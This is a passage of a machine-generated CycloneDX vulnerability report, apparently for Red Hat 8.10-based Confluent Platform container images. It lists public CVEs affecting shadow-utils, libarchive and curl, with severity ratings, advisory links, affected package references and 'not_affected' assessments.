          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2024-56433",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.6,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        1188
      ],
      "description": "shadow-utils (aka shadow) 4.4 through 4.17.0 establishes a default /etc/subuid behavior (e.g., uid 100000 through 165535 for the first user account) that can realistically conflict with the uids of users defined on locally administered networks, potentially leading to account takeover, e.g., by leveraging newuidmap for access to an NFS home directory (or same-host resources in the case of remote logins by these local network users). NOTE: it may also be argued that system administrators should not have assigned uids, within local networks, that are within the range that can occur in /etc/subuid.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-56433"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:20559"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-56433"
        },
        {
          "url": "https://bugzilla.redhat.com/2334165"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2334165"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-56433"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2025-20559.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2025:20559"
        },
        {
          "url": "https://github.com/shadow-maint/shadow/blob/e2512d5741d4a44bdd81a8c2d0029b6222728cf0/etc/login.defs#L238-L241"
        },
        {
          "url": "https://github.com/shadow-maint/shadow/issues/1157"
        },
        {
          "url": "https://github.com/shadow-maint/shadow/releases/tag/4.4"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2024-56433.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2025-20559-0.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-56433"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-56433"
        }
      ],
      "published": "2024-12-26T09:15:07+00:00",
      "updated": "2026-06-17T08:12:10+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2",
          "versions": [
            {
              "version": "2:4.6-23.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2024-57970",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        126
      ],
      "description": "libarchive through 3.7.7 has a heap-based buffer over-read in header_gnu_longlink in archive_read_support_format_tar.c via a TAR archive because it mishandles truncation in the middle of a GNU long linkname.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-57970"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:7510"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-57970"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2345954"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-57970"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2025:7510"
        },
        {
          "url": "https://github.com/advisories/GHSA-2q66-6w43-8rm9"
        },
        {
          "url": "https://github.com/libarchive/libarchive/issues/2415"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/2422"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2024-57970.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2025-7510.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-57970"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-57970"
        }
      ],
      "published": "2025-02-16T04:15:21+00:00",
      "updated": "2026-06-17T08:14:20+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.3.3-7.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2024-7264",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        125
      ],
      "description": "libcurl's ASN1 parser code has the `GTime2str()` function, used for parsing an\nASN.1 Generalized Time field. If given an syntactically incorrect field, the\nparser might end up using -1 for the length of the *time fraction*, leading to\na `strlen()` getting performed on a pointer to a heap buffer area that is not\n(purposely) null terminated.\n\nThis flaw most likely leads to a crash, but can also lead to heap contents\ngetting returned to the application when\n[CURLINFO_CERTINFO](https://curl.se/libcurl/c/CURLINFO_CERTINFO.html) is used.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-7264"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2024/07/31/1"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:1671"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-7264"
        },
        {
          "url": "https://bugzilla.redhat.com/2294581"
        },
        {
          "url": "https://bugzilla.redhat.com/2294676"
        },
        {
          "url": "https://bugzilla.redhat.com/2301888"
        },
        {
          "url": "https://bugzilla.redhat.com/2318857"
        },
        {
          "url": "https://bugzilla.redhat.com/2318858"
        },
        {
          "url": "https://bugzilla.redhat.com/2318870"
        },
        {
          "url": "https://bugzilla.redhat.com/2318873"
        },
        {
          "url": "https://bugzilla.redhat.com/2318874"
        },
        {
          "url": "https://bugzilla.redhat.com/2318876"
        },
        {
          "url": "https://bugzilla.redhat.com/2318882"
        },
        {
          "url": "https://bugzilla.redhat.com/2318883"
        },
        {
          "url": "https://bugzilla.redhat.com/2318884"
        },
        {
          "url": "https://bugzilla.redhat.com/2318885"
        },
        {
          "url": "https://bugzilla.redhat.com/2318886"
        },
        {
          "url": "https://bugzilla.redhat.com/2318897"
        },
        {
          "url": "https://bugzilla.redhat.com/2318900"
        },
        {
          "url": "https://bugzilla.redhat.com/2318905"
        },
        {
          "url": "https://bugzilla.redhat.com/2318914"
        },
        {
          "url": "https://bugzilla.redhat.com/2318922"
        },
        {
          "url": "https://bugzilla.redhat.com/2318923"
        },
        {
          "url": "https://bugzilla.redhat.com/2318925"
        },
        {
          "url": "https://bugzilla.redhat.com/2318926"
        },
        {
          "url": "https://bugzilla.redhat.com/2318927"
        },
        {
          "url": "https://bugzilla.redhat.com/2331191"
        },
        {
          "url": "https://bugzilla.redhat.com/2339218"
        },
        {
          "url": "https://bugzilla.redhat.com/2339220"
        },
        {
          "url": "https://bugzilla.redhat.com/2339221"
        },
        {
          "url": "https://bugzilla.redhat.com/2339226"
        },
        {
          "url": "https://bugzilla.redhat.com/2339231"
        },
        {
          "url": "https://bugzilla.redhat.com/2339236"
        },
        {
          "url": "https://bugzilla.redhat.com/2339238"
        },
        {
          "url": "https://bugzilla.redhat.com/2339243"
        },
        {
          "url": "https://bugzilla.redhat.com/2339247"
        },
        {
          "url": "https://bugzilla.redhat.com/2339252"
        },
        {
          "url": "https://bugzilla.redhat.com/2339259"
        },
        {
          "url": "https://bugzilla.redhat.com/2339266"
        },
        {
          "url": "https://bugzilla.redhat.com/2339270"
        },
        {
          "url": "https://bugzilla.redhat.com/2339271"
        },
        {
          "url": "https://bugzilla.redhat.com/2339275"
        },
        {
          "url": "https://bugzilla.redhat.com/2339277"
        },
        {
          "url": "https://bugzilla.redhat.com/2339281"
        },
        {
          "url": "https://bugzilla.redhat.com/2339284"
        },
        {
          "url": "https://bugzilla.redhat.com/2339291"
        },
        {
          "url": "https://bugzilla.redhat.com/2339293"
        },
        {
          "url": "https://bugzilla.redhat.com/2339295"
        },
        {
          "url": "https://bugzilla.redhat.com/2339299"
        },
        {
          "url": "https://bugzilla.redhat.com/2339300"
        },
        {
          "url": "https://bugzilla.redhat.com/2339304"
        },
        {
          "url": "https://bugzilla.redhat.com/2339305"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294581"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294676"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2301888"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318857"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318858"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318870"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318873"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318874"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318876"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318882"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318883"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318884"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318885"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318886"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318897"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318900"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318905"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318914"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318922"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318923"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318925"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318926"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318927"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2331191"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339218"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339220"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339221"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339226"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339231"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339236"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339238"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339243"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339247"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339252"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339259"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339266"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339270"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339271"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339275"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339277"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339281"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339284"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339291"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339293"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339295"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339299"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339300"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339304"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339305"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://curl.se/docs/CVE-2024-7264.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2024-7264.json"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-11053"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21193"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21194"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21196"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21197"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21198"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21199"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21201"
        },
        {
